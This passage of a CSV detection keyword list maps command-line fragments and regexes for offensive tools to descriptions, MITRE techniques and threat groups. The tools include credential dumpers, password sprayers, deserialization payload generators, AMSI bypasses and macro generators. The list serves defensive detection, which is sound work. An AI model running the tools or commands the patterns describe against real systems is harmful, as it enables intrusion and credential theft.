--output rootDSEs.json --dump*",".{0,1000}\s\-\-output\srootDSEs\.json\s\-\-dump.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "* ovs-agent-version.nse*",".{0,1000}\sovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* owa * --user-as-pass *",".{0,1000}\sowa\s.{0,1000}\s\-\-user\-as\-pass\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* oxidfind -i *",".{0,1000}\soxidfind\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* oxidfind -n *",".{0,1000}\soxidfind\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* -p * --amsi-bypass *",".{0,1000}\s\-p\s.{0,1000}\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -p * -d *.dll -e 
OpenProcess*",".{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\.dll\s\-e\sOpenProcess.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "* -p *\mimi.out*",".{0,1000}\s\-p\s.{0,1000}\\mimi\.out.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -p 1337:1337 -p 5000:5000*",".{0,1000}\s\-p\s1337\:1337\s\-p\s5000\:5000.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 
- T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* -p 4644 -n mal*",".{0,1000}\s\-p\s4644\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*",".{0,1000}\s\-p\s\'aad3b435b51404eeaad3b435b51404ee\:31d6cfe0d16ae931b73c59d7e0c089c0\'.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "* -p ActivatorUrl*",".{0,1000}\s\-p\sActivatorUrl.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p Altserialization*",".{0,1000}\s\-p\sAltserialization.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p CommonsCollections1 -c whoami*",".{0,1000}\s\-p\sCommonsCollections1\s\-c\swhoami.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell 
spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -p DotNetNuke*",".{0,1000}\s\-p\sDotNetNuke.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p LastLogonTimestamp -p LastLogonUserName *",".{0,1000}\s\-p\sLastLogonTimestamp\s\-p\sLastLogonUserName\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* -p powershell -i *.ps1 -o *.vba*",".{0,1000}\s\-p\spowershell\s\-i\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* -p pwd1.list pwd2.list *",".{0,1000}\s\-p\spwd1\.list\spwd2\.list\s.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "* -p SessionSecurityTokenHandler*",".{0,1000}\s\-p\sSessionSecurityTokenHandler.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p shellcode -i *.bin -o *.vba*",".{0,1000}\s\-p\sshellcode\s\-i\s.{0,1000}\.bin\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* -p test_passwords.txt*",".{0,1000}\s\-p\stest_passwords\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -p TransactionManagerReenlist*",".{0,1000}\s\-p\sTransactionManagerReenlist.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p windows/x64/exec CMD=*.exe -f 
rust*",".{0,1000}\s\-p\swindows\/x64\/exec\sCMD\=.{0,1000}\.exe\s\-f\srust.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -p windows/x64/messagebox TITLE=NovaLdr *",".{0,1000}\s\-p\swindows\/x64\/messagebox\sTITLE\=NovaLdr\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*' p::d '*",".{0,1000}\'\sp\:\:d\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* -p:AssemblyName=inveigh*",".{0,1000}\s\-p\:AssemblyName\=inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* p2p-conficker.nse*",".{0,1000}\sp2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --pacu-help*",".{0,1000}\s\-\-pacu\-help.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "* pamspy_event.h*",".{0,1000}\spamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - 
T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Parasite Invoke.exe*",".{0,1000}\sParasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "* parrot main *",".{0,1000}\sparrot\smain\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot.run/*",".{0,1000}\sparrot\.run\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-backports *",".{0,1000}\sparrot\-backports\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-security *",".{0,1000}\sparrot\-security\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --passnotreq --domain * --user * --pass *",".{0,1000}\s\-\-passnotreq\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* passwd.py*",".{0,1000}\spasswd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --password wordlists/*.txt*",".{0,1000}\s\-\-password\swordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "* password.lst*",".{0,1000}\spassword\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* password_cracker.py*",".{0,1000}\spassword_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment 
pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -PasswordList *",".{0,1000}\s\-PasswordList\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --password-list 
*",".{0,1000}\s\-\-password\-list\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --password-not-required --kdcHost *cme*",".{0,1000}\s\-\-password\-not\-required\s\-\-kdcHost\s.{0,1000}cme.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -PasswordSpray *",".{0,1000}\s\-PasswordSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* passwordspray -d *",".{0,1000}\spasswordspray\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
